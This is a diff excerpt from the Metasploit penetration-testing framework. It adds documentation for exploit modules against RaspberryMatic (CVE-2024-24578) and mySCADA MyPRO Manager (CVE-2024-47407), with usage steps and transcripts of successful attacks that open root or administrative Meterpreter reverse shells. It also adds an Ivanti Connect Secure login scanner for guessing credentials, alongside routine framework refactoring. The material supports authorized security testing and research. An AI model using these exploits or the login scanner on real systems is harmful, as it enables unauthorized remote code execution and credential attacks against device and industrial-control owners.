+filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in `/usr/local/addons/mediola/bin/`,
+which will be executed every five minutes through a cron job where attackers can gain remote code execution as root user,
+allowing a full system compromise.
+
+RaspberryMatic versions <= `3.73.9.20240130` are vulnerable.
+
+The following releases were tested.
+
+**RaspberryMatic Releases:**
+* RaspberryMatic v3.73.9 (OVA image)
+* RaspberryMatic v3.65.8 (Raspberry Pi4 Model B image)
+
+## Installation steps to install RaspberryMatic OVA image
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [RaspberryMatic OVA](https://github.com/jens-maus/RaspberryMatic/releases/tag/3.73.9.20240130).
+* Install the OVA image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options via the `webui`.
+* Boot up the VM and should be able to access the RaspberryMatic appliance via the `webui` via `http://your_ip/`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options defined.
+
+## Scenarios
+### RaspberryMatic OVA appliance - Unix/Linux Command x64 target
+```msf
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set FETCH_SRVHOST 192.168.201.8
+FETCH_SRVHOST => 192.168.201.8
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. RaspberryMatic 3.73.9
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Uploading sT2s4fChKUZ.tgz
+[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[*] Restoring original watchdog script.
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:51220) at 2025-01-28 18:00:01 +0000
+
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           :  (Linux 6.1.74)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/root
+meterpreter >
+```
+### RaspberryMatic Pi4 Model B compute board - Unix/Linux Command aarch64 target
+```msf
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set payload cmd/linux/http/aarch64/meterpreter_reverse_tcp
+payload => cmd/linux/http/aarch64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.10:443 can be exploited.
+[+] The target appears to be vulnerable. RaspberryMatic 3.65.8
+[*] Executing Unix/Linux Command for cmd/linux/http/aarch64/meterpreter_reverse_tcp
+[*] Uploading 8emVtVt6U.tgz
+[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
+[*] Restoring original watchdog script.
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:40324) at 2025-02-03 17:40:01 +0000
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           :  (Linux 5.15.56)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/root
+meterpreter >
+```
+## Limitations
+You have to wait maximum five minutes for a session to allow `cron` to run the malicious watchdog script
+containing the payload. Just be patient and wait for the magic to happen ;-)
+Another limitation is that the root filesystem on RaspberyMatic image is mounted read-only, so you need to set the
+option `FETCH_WRITABLE_DIR` to `/tmp` (this is mounted RW) otherwise the exploit will fail.
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`myscada9`, an administrative user that is automatically added by the product during installation.
+
+Versions <= 1.2 are affected. CISA published [ICSA-24-326-07](https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07) to cover
+the security issues. The official changelog from the vendor for the updated version is available
+[here](https://www.myscada.org/docs/5-11-2024/).
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.2 on Windows 11 (10.0 Build 22621)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/mypro_mgr_cmd 
+msf6 exploit(windows/scada/mypro_mgr_cmd) > set RHOSTS <IP>
+msf6 exploit(windows/scada/mypro_mgr_cmd) > exploit 
+```
+
+You should get a meterpreter session in the context of `myscada9`.
+
+## Scenarios
+
+Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/mypro_mgr_cmd) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.227:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (201798 bytes) to 192.168.1.228
+[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
+[*] Exploit finished, check thy shell.
+
+meterpreter > getuid 
+Server username: asdf\myscada9
+meterpreter > sysinfo 
+Computer        : asdf
+OS              : Windows 11 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+```
@@ -77,6 +77,10 @@ read_loop:
    svc    0
    cmn    x0, #0x1
    beq    failed
+    mov    x2, x0       // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+    mov    x8, #0x51    // More information here: 
+    svc    0            //    https://github.com/rapid7/metasploit-framework/pull/19875
+    mov    x0, x2       //
    add    x3, x3, x0
    subs   x4, x4, x0
    bne    read_loop
@@ -212,6 +212,23 @@ module Metasploit::Framework
    #   @return [Boolean]
    attr_accessor :anonymous_login

+    # @!attribute ignore_private
+    #   Whether to ignore private (password). This is usually set when Kerberos
+    #   or Schannel authentication is requested and the credentials are
+    #   retrieved from cache or from a file. This attribute should be true in
+    #   these scenarios, otherwise validation will fail since the password is not
+    #   provided.
+    #   @return [Boolean]
+    attr_accessor :ignore_private
+
+    # @!attribute ignore_public
+    #   Whether to ignore public (username). This is usually set when Schannel
+    #   authentication is requested and the credentials are retrieved from a
+    #   file (certificate). This attribute should be true in this case,
+    #   otherwise validation will fail since the password is not provided.
+    #   @return [Boolean]
+    attr_accessor :ignore_public
+
    # @option opts [Boolean] :blank_passwords See {#blank_passwords}
    # @option opts [String] :pass_file See {#pass_file}
    # @option opts [String] :password See {#password}
@@ -240,7 +257,13 @@ module Metasploit::Framework
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
    def each_filtered
-      if password_spray
+      if ignore_private
+        if ignore_public
+          yield Metasploit::Framework::Credential.new(public: nil, private: nil, realm: realm)
+        else
+          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm)
+        end
+      elsif password_spray
        each_unfiltered_password_first do |credential|
          next unless self.filter.nil? || self.filter.call(credential)

@@ -510,14 +533,14 @@ module Metasploit::Framework
    #
    # @return [Boolean]
    def has_users?
-      username.present? || user_file.present? || userpass_file.present? || !additional_publics.empty?
+      username.present? || user_file.present? || userpass_file.present? || !additional_publics.empty? || !!ignore_public
    end

    # Returns true when there are any private values set
    #
    # @return [Boolean]
    def has_privates?
-      super || userpass_file.present? || user_as_pass
+      super || userpass_file.present? || user_as_pass || !!ignore_private
    end

  end
@@ -0,0 +1,194 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # Ivanti Login Scanner supporting
+      # - User Login
+      # - Admin Login
+      class Ivanti < HTTP
+
+        DEFAULT_SSL_PORT = 443
+        LIKELY_PORTS = [443]
+        LIKELY_SERVICE_NAMES = [
+          'Ivanti Connect Secure'
+        ]
+        PRIVATE_TYPES = [:password]
+        REALM_KEY = nil
+
+        def initialize(scanner_config, admin)
+          @admin = admin
+          super(scanner_config)
+        end
+
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri('/dana-na/auth/url_default/welcome.cgi')
+          }
+
+          res = send_request(request_params)
+
+          if res && res.code == 200 && res.body&.include?('Ivanti Connect Secure')
+            return false
+          end
+
+          'Application might not be Ivanti Connect Secure, please check'
+        end
+
+        def create_admin_request(username, password, token, protocol, peer)
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/dana-na/auth/url_admin/login.cgi'),
+            'ctype' => 'application/x-www-form-urlencoded',
+            'headers' =>
+            {
+              'Origin' => "#{protocol}://#{peer}",
+              'Referer' => "#{protocol}://#{peer}/dana-na/auth/url_admin/welcome.cgi"
+            },
+            'vars_post' => {
+              tz_offset: '60',
+              xsauth_token: token,
+              username: username,
+              password: password,
+              realm: 'Admin+Users',
+              btnSubmit: 'Sign+In'
+
+            },
+            'encode_params' => false
+          }
+        end
+
+        def do_admin_logout(cookies)
+          admin_page_res = send_request({ 'method' => 'GET', 'uri' => normalize_uri('/dana-admin/misc/admin.cgi?'), 'cookie' => cookies })
+          admin_page_s = admin_page_res.to_s
+          re = /xsauth=[a-z0-9]{32}/
+          xsauth = re.match(admin_page_s)
+
+          return nil if xsauth.nil?
+
+          send_request({ 'method' => 'GET', 'uri' => normalize_uri('/dana-na/auth/logout.cgi?' + xsauth[0]), 'cookie' => cookies })
+        end
+
+        def get_token
+          res = send_request({
+            'uri' => normalize_uri('/dana-na/auth/url_admin/welcome.cgi')
+          })
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+
+          html_document = res.get_html_document
+          html_document.xpath('//input[@id="xsauth_token"]/@value')&.text
+        end
+
+        def do_admin_login(username, password)
+          token = get_token
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if token.blank?
+
+          protocol = ssl ? 'https' : 'http'
+          peer = "#{host}:#{port}"
+          admin_req = create_admin_request(username, password, token, protocol, peer)
+          begin
+            res = send_request(admin_req)
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Received an unexpected status code: #{res.code}" } if res.code != 302
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unexpected response' } if !res.headers&.key?('location')
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res.headers['location'] == '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm'
+
+          if res.headers['location'] == '/dana-admin/misc/admin.cgi'
+            do_admin_logout(res.get_cookies)
+            return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s }
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s }
+        end
+
+        def create_user_request(username, password, protocol, peer)
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/dana-na/auth/url_default/login.cgi'),
+            'ctype' => 'application/x-www-form-urlencoded',
+            'headers' =>
+            {
+              'Origin' => "#{protocol}://#{peer}",
+              'Referer' => "#{protocol}://#{peer}/dana-na/auth/url_default/welcome.cgi"
+            },
+            'vars_post' =>
+              {
+                tz_offset: '',
+                win11: '',
+                clientMAC: '',
+                username: username,
+                password: password,
+                realm: 'Users',
+                btnSubmit: 'Sign+In'
+              },
+            'encode_params' => false
+          }
+        end
+
+        def do_logout(cookies)
+          send_request({ 'uri' => normalize_uri('/dana-na/auth/logout.cgi?delivery=psal'), 'cookie' => cookies })
+        end
+
+        def do_login(username, password)
+          protocol = ssl ? 'https' : 'http'
+          peer = "#{host}:#{port}"
+          user_req = create_user_request(username, password, protocol, peer)
+          begin
+            res = send_request(user_req)
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Received an unexpected status code: #{res.code}" } if res.code != 302
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unexpected response' } if !res.headers&.key?('location')
+
+          if res.headers['location'] == '/dana-na/auth/url_default/welcome.cgi?p=ip%2Dblocked'
+            sleep(2 * 60) # 2 minutes
+            res = send_request(user_req)
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res.headers['location'] == '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm'
+
+          if res.headers['location'] == '/dana/home/starter0.cgi?check=yes'
+            do_logout(res.get_cookies)
+            return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s }
+          else
+            return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s }
+          end
+        end
+
+        # Attempts to login to the server.
+        #
+        # @param [Metasploit::Framework::Credential] credential The credential information.
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          # focus on creating Result object, pass it to #login routine and return Result object
+          result_options = {
+            credential: credential,
+            host: @host,
+            port: @port,
+            protocol: 'tcp',
+            service_name: 'ivanti'
+          }
+
+          if @admin
+            login_result = do_admin_login(credential.public, credential.private)
+          else
+            login_result = do_login(credential.public, credential.private)
+          end
+
+          result_options.merge!(login_result)
+          Result.new(result_options)
+        end
+
+      end
+    end
+  end
+end
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.46"
+      VERSION = "6.4.52"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -623,7 +623,7 @@ class ReadableText
    )
    options.sort_by(&:name).each do |opt|
      name = opt.name
-      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+      if mod.datastore.is_a?(Msf::DataStore)
        val = mod.datastore[name]
      else
        val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
@@ -202,6 +202,8 @@ Shell Banner:
      tbl << [key, value]
    end

+    tbl << ['.<command>', "Prefix any built-in command on this list with a '.' to execute in the underlying shell (ex: .help)"]
+
    print(tbl.to_s)
    print("For more info on a specific command, use %grn<command> -h%clr or %grnhelp <command>%clr.\n\n")
  end
@@ -607,8 +609,13 @@ Shell Banner:
    end

    # Built-in command
-    if commands.key?(method)
-      return run_builtin_cmd(method, arguments)
+    if commands.key?(method) or ( not method.nil? and method[0] == '.' and commands.key?(method[1..-1]))
+      # Handle overlapping built-ins with actual shell commands by prepending '.'
+      if method[0] == '.' and commands.key?(method[1..-1])
+        return shell_write(cmd[1..-1] + command_termination)
+      else
+        return run_builtin_cmd(method, arguments)
+      end
    end

    # User input is not a built-in command, write to socket directly
@@ -3,40 +3,61 @@ module Msf

 ###
 #
-# The data store is just a bitbucket that holds keyed values.  It is used
+# The data store is just a bitbucket that holds keyed values. It is used
 # by various classes to hold option values and other state information.
 #
 ###
-class DataStore < Hash
+class DataStore

-  # Temporary forking logic for conditionally using the {Msf::ModuleDatastoreWithFallbacks} implementation.
+  # The global framework datastore doesn't currently import options
+  # For now, store an ad-hoc list of keys that the shell handles
  #
-  # This method replaces the default `ModuleDataStore.new` with the ability to instantiate the `ModuleDataStoreWithFallbacks`
-  # class instead, if the feature is enabled
-  def self.new
-    if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-      return Msf::DataStoreWithFallbacks.new
-    end
-
-    instance = allocate
-    instance.send(:initialize)
-    instance
-  end
+  # This list could be removed if framework's bootup sequence registers
+  # these as datastore options
+  GLOBAL_KEYS = %w[
+    ConsoleLogging
+    LogLevel
+    MinimumRank
+    SessionLogging
+    TimestampOutput
+    Prompt
+    PromptChar
+    PromptTimeFormat
+    MeterpreterPrompt
+    SessionTlvLogging
+  ]

  #
  # Initializes the data store's internal state.
  #
-  def initialize()
+  def initialize
    @options     = Hash.new
    @aliases     = Hash.new
-    @imported    = Hash.new
-    @imported_by = Hash.new
+
+    # default values which will be referenced when not defined by the user
+    @defaults = Hash.new
+
+    # values explicitly defined, which take precedence over default values
+    @user_defined = Hash.new
  end

+  # @return [Hash{String => Msf::OptBase}] The options associated with this datastore. Used for validating values/defaults/etc
  attr_accessor :options
-  attr_accessor :aliases
-  attr_accessor :imported
-  attr_accessor :imported_by
+
+  #
+  # Returns a hash of user-defined datastore values. The returned hash does
+  # not include default option values.
+  #
+  # @return [Hash<String, Object>] values explicitly defined on the data store which will override any default datastore values
+  attr_accessor :user_defined
+
+  #
+  # Was this entry actually set or just using its default
+  #
+  # @return [TrueClass, FalseClass]
+  def default?(key)
+    search_for(key).default?
+  end

  #
  # Clears the imported flag for the supplied key since it's being set
@@ -44,8 +65,6 @@ class DataStore < Hash
  #
  def []=(k, v)
    k = find_key_case(k)
-    @imported[k] = false
-    @imported_by[k] = nil

    opt = @options[k]
    unless opt.nil?
@@ -57,49 +76,76 @@ class DataStore < Hash
      end
    end

-    super(k,v)
+    @user_defined[k] = v
  end

  #
  # Case-insensitive wrapper around hash lookup
  #
  def [](k)
-    super(find_key_case(k))
+    search_result = search_for(k)
+
+    search_result.value
  end

  #
-  # Case-insensitive wrapper around store
+  # Case-insensitive wrapper around store; Skips option validation entirely
  #
  def store(k,v)
-    super(find_key_case(k), v)
+    @user_defined[find_key_case(k)] = v
  end

-  #
-  # Case-insensitive wrapper around delete
-  #
-  def delete(k)
-    @aliases.delete_if { |_, v| v.casecmp(k) == 0 }
-    super(find_key_case(k))
-  end
-
-
  #
  # Updates a value in the datastore with the specified name, k, to the
-  # specified value, v.  This update does not alter the imported status of
-  # the value.
+  # specified value, v. Skips option validation entirely.
  #
  def update_value(k, v)
-    self.store(k, v)
+    store(k, v)
+  end
+
+  #
+  # unset the current key from the datastore
+  # @param [String] key The key to search for
+  def unset(key)
+    k = find_key_case(key)
+    search_result = search_for(k)
+    @user_defined.delete(k)
+
+    search_result.value
+  end
+
+  # @deprecated use #{unset} instead, or set the value explicitly to nil
+  # @param [String] key The key to search for
+  def delete(key)
+    unset(key)
+  end
+
+  #
+  # Removes an option and any associated value
+  #
+  # @param [String] name the option name
+  # @return [nil]
+  def remove_option(name)
+    k = find_key_case(name)
+    @user_defined.delete(k)
+    @aliases.delete_if { |_, v| v.casecmp?(k) }
+    @options.delete_if { |option_name, _v| option_name.casecmp?(k) || option_name.casecmp?(name) }
+
+    nil
  end

  #
  # This method is a helper method that imports the default value for
  # all of the supplied options
  #
-  def import_options(options, imported_by = nil, overwrite = false)
-    options.each_option do |name, opt|
-      if self[name].nil? || overwrite
-        import_option(name, opt.default, true, imported_by, opt)
+  def import_options(options, imported_by = nil, overwrite = true)
+    options.each_option do |name, option|
+      if self.options[name].nil? || overwrite
+        key = name
+        option.aliases.each do |a|
+          @aliases[a.downcase] = key.downcase
+        end
+        @options[key] = option
      end
    end
  end
@@ -142,22 +188,32 @@ class DataStore < Hash
      hash[var] = val
    }

-    import_options_from_hash(hash)
+    merge!(hash)
  end

  #
-  # Imports options from a hash and stores them in the datastore.
+  # Imports values from a hash and stores them in the datastore.
  #
+  # @deprecated use {#merge!} instead
+  # @return [nil]
  def import_options_from_hash(option_hash, imported = true, imported_by = nil)
-    option_hash.each_pair { |key, val|
-      import_option(key, val, imported, imported_by)
-    }
+    merge!(option_hash)
+  end
+
+  # Update defaults from a hash. These merged values are not validated by default.
+  #
+  # @param [Hash<String, Object>] hash The default values that should be used by the datastore
+  # @param [Object] imported_by Who imported the defaults, not currently used
+  # @return [nil]
+  def import_defaults_from_hash(hash, imported_by:)
+    @defaults.merge!(hash)
  end

  # TODO: Doesn't normalize data in the same vein as:
  # https://github.com/rapid7/metasploit-framework/pull/6644
+  # @deprecated Use {#import_options}
  def import_option(key, val, imported = true, imported_by = nil, option = nil)
-    self.store(key, val)
+    store(key, val)

    if option
      option.aliases.each do |a|
@@ -165,10 +221,32 @@ class DataStore < Hash
      end
    end
    @options[key] = option
-    @imported[key] = imported
-    @imported_by[key] = imported_by
  end

+  # @return [Array<String>] The array of user defined datastore values, and registered option names
+  def keys
+    (@user_defined.keys + @options.keys).uniq(&:downcase)
+  end
+
+  # @return [Integer] The length of the registered keys
+  def length
+    keys.length
+  end
+
+  alias count length
+  alias size length
+
+  # @param [String] key
+  # @return [TrueClass, FalseClass] True if the key is present in the user defined values, or within registered options. False otherwise.
+  def key?(key)
+    matching_key = find_key_case(key)
+    keys.include?(matching_key)
+  end
+
+  alias has_key? key?
+  alias include? key?
+  alias member? key?
+
  #
  # Serializes the options in the datastore to a string.
  #
@@ -179,7 +257,7 @@ class DataStore < Hash
      str << "#{key}=#{self[key]}" + ((str.length) ? delim : '')
    }

-    return str
+    str
  end

  # Override Hash's to_h method so we can include the original case of each key
@@ -188,7 +266,7 @@ class DataStore < Hash
  def to_h
    datastore_hash = {}
    self.keys.each do |k|
-      datastore_hash[k.to_s] = self[k].to_s
+      datastore_hash[k.to_s] = self[k]
    end
    datastore_hash
  end
@@ -225,7 +303,7 @@ class DataStore < Hash
    ini.add_group(name)

    # Save all user-defined options to the file.
-    user_defined.each_pair { |k, v|
+    @user_defined.each_pair { |k, v|
      ini[name][k] = v
    }

@@ -243,73 +321,73 @@ class DataStore < Hash
      return
    end

-    if (ini.group?(name))
-      import_options_from_hash(ini[name], false)
+    if ini.group?(name)
+      merge!(ini[name])
    end
  end

  #
-  # Return a deep copy of this datastore.
-  #
+  # Return a copy of this datastore. Only string values will be duplicated, other values
+  # will share the same reference
+  # @return [Msf::DataStore] a new datastore instance
  def copy
-    ds = self.class.new
-    self.keys.each do |k|
-      ds.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k])
-    end
-    ds.aliases = self.aliases.dup
-    ds
+    new_instance = self.class.new
+    new_instance.copy_state(self)
+    new_instance
  end

  #
-  # Override merge! so that we merge the aliases and imported hashes
+  # Merge the other object into the current datastore's aliases and imported hashes
  #
+  # @param [Msf::Datastore, Hash] other
  def merge!(other)
-    if other.is_a? DataStore
+    if other.is_a?(DataStore)
      self.aliases.merge!(other.aliases)
-      self.imported.merge!(other.imported)
-      self.imported_by.merge!(other.imported_by)
+      self.options.merge!(other.options)
+      self.defaults.merge!(other.defaults)
+      other.user_defined.each do |k, v|
+        @user_defined[find_key_case(k)] = v
+      end
+    else
+      other.each do |k, v|
+        self.store(k, v)
+      end
    end
-    # call super last so that we return a reference to ourselves
-    super
+
+    self
+  end
+
+  alias update merge!
+
+  #
+  # Reverse Merge the other object into the current datastore's aliases and imported hashes
+  # Equivalent to ActiveSupport's reverse_merge! functionality.
+  #
+  # @param [Msf::Datastore] other
+  def reverse_merge!(other)
+    raise ArgumentError, "invalid error type #{other.class}, expected ::Msf::DataStore" unless other.is_a?(Msf::DataStore)
+
+    copy_state(other.merge(self))
  end

  #
  # Override merge to ensure we merge the aliases and imported hashes
  #
+  # @param [Msf::Datastore,Hash] other
  def merge(other)
    ds = self.copy
    ds.merge!(other)
  end

  #
-  # Returns a hash of user-defined datastore values.  The returned hash does
-  # not include default option values.
-  #
-  def user_defined
-    reject { |k, v|
-      @imported[k] == true
-    }
-  end
-
-  #
-  # Remove all imported options from the data store.
-  #
-  def clear_non_user_defined
-    @imported.delete_if { |k, v|
-      if (v and @imported_by[k] != 'self')
-        self.delete(k)
-        @imported_by.delete(k)
-      end
-
-      v
-    }
-  end
-
-  #
-  # Completely clear all values in the hash
+  # Completely clear all values in the data store
  #
  def clear
-    self.keys.each {|k| self.delete(k) }
+    self.options.clear
+    self.aliases.clear
+    self.defaults.clear
+    self.user_defined.clear
+
    self
  end

@@ -325,28 +403,145 @@ class DataStore < Hash
    list.each(&block)
  end

+  alias each_pair each
+
+  def each_key(&block)
+    self.keys.each(&block)
+  end
+
  #
  # Case-insensitive key lookup
  #
+  # @return [String]
  def find_key_case(k)
-
    # Scan each alias looking for a key
    search_k = k.downcase
    if self.aliases.has_key?(search_k)
      search_k = self.aliases[search_k]
    end

+    # Check to see if we have an exact key match - otherwise we'll have to search manually to check case sensitivity
+    if @user_defined.key?(search_k) || options.key?(search_k)
+      return search_k
+    end
+
    # Scan each key looking for a match
-    self.each_key do |rk|
+    each_key do |rk|
      if rk.casecmp(search_k) == 0
        return rk
      end
    end

    # Fall through to the non-existent value
-    return k
+    k
  end

+  # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
+  #
+  # @param [String] key The key to search for
+  # @return [DataStoreSearchResult]
+  def search_for(key)
+    k = find_key_case(key)
+    return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
+
+    option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
+    if option
+      # If the key isn't present - check any additional fallbacks that have been registered with the option.
+      # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
+      # generic 'Username' fallback
+      option.fallbacks.each do |fallback|
+      fallback_search = search_for(fallback)
+        if fallback_search.found?
+          return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
+        end
+      end
+    end
+
+    # Checking for imported default values, ignoring case again
+    imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
+    return search_result(:imported_default, imported_default_match.last) if imported_default_match
+    return search_result(:option_default, option.default) if option
+
+    search_result(:not_found, nil)
+  end
+
+  protected
+
+  # These defaults will be used if the user has not explicitly defined a specific datastore value.
+  # These will be checked as a priority to any options that also provide defaults.
+  #
+  # @return [Hash{String => Msf::OptBase}] The hash of default values
+  attr_accessor :defaults
+
+  # @return [Hash{String => String}] The key is the old option name, the value is the new option name
+  attr_accessor :aliases
+
+  #
+  # Copy the state from the other Msf::DataStore. The state will be coped in a shallow fashion, other than
+  # imported and user_defined strings.
+  #
+  # @param [Msf::DataStore] other The other datastore to copy state from
+  # @return [Msf::DataStore] the current datastore instance
+  def copy_state(other)
+    self.options = other.options.dup
+    self.aliases = other.aliases.dup
+    self.defaults = other.defaults.transform_values { |value| value.kind_of?(String) ? value.dup : value }
+    self.user_defined = other.user_defined.transform_values { |value| value.kind_of?(String) ? value.dup : value }
+
+    self
+  end
+
+  # Raised when the specified key is not found
+  # @param [string] key
+  def key_error_for(key)
+    ::KeyError.new "key not found: #{key.inspect}"
+  end
+
+  #
+  # Simple dataclass for storing the result of a datastore search
+  #
+  class DataStoreSearchResult
+    # @return [String, nil] the key associated with the fallback value
+    attr_reader :fallback_key
+
+    # @return [object, nil] The value if found
+    attr_reader :value
+
+    def initialize(result, value, namespace: nil, fallback_key: nil)
+      @namespace = namespace
+      @result = result
+      @value = value
+      @fallback_key = fallback_key
+    end
+
+    def default?
+      result == :imported_default || result == :option_default || !found?
+    end
+
+    def found?
+      result != :not_found
+    end
+
+    def fallback?
+      result == :option_fallback
+    end
+
+    def global?
+      namespace == :global_data_store && found?
+    end
+
+  protected
+
+    # @return [Symbol] namespace Where the search result was found, i.e. a module datastore or global datastore
+    attr_reader :namespace
+
+    # @return [Symbol] result is one of `user_defined`, `not_found`, `option_fallback`, `option_default`, `imported_default`
+    attr_reader :result
+  end
+
+  def search_result(result, value, fallback_key: nil)
+    DataStoreSearchResult.new(result, value, namespace: :global_data_store, fallback_key: fallback_key)
+  end
 end

 end
@@ -1,547 +0,0 @@
-# -*- coding: binary -*-
-module Msf
-
-###
-#
-# The data store is just a bitbucket that holds keyed values. It is used
-# by various classes to hold option values and other state information.
-#
-###
-class DataStoreWithFallbacks
-
-  # The global framework datastore doesn't currently import options
-  # For now, store an ad-hoc list of keys that the shell handles
-  #
-  # This list could be removed if framework's bootup sequence registers
-  # these as datastore options
-  GLOBAL_KEYS = %w[
-    ConsoleLogging
-    LogLevel
-    MinimumRank
-    SessionLogging
-    TimestampOutput
-    Prompt
-    PromptChar
-    PromptTimeFormat
-    MeterpreterPrompt
-    SessionTlvLogging
-  ]
-
-  #
